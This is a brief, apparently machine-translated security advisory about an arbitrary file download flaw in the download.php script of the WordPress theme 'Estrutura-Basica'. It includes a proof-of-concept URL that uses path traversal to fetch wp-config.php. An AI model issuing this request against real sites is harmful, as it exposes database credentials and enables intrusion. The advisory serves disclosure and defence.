WordPress Estrutura-Basica topic 'download. php' Arbitrary File download Vulnerability
WordPress Estrutura-Basica topic 'download. php' Arbitrary File download Vulnerability
Release date:
Updated on:
Affected Systems:
WordPress Estrutura-Basica
Description:
Bugtraq id: 74828
Estrutura-Basica is a topic of the WordPress website.
WordPress Estrutura-Basica has the Arbitrary File download Vulnerability in the 'download. php' implementation. Attackers can exploit this vulnerability to download arbitrary files in the context of Web server processes.
<* Source: FullSecurity.org
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/wp-content/themes/estrutura-basica/scripts/download.php? Arquivo =.../wp-config.php
Suggestion:
Vendor patch:
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://wordpress.org/
This article permanently updates the link address: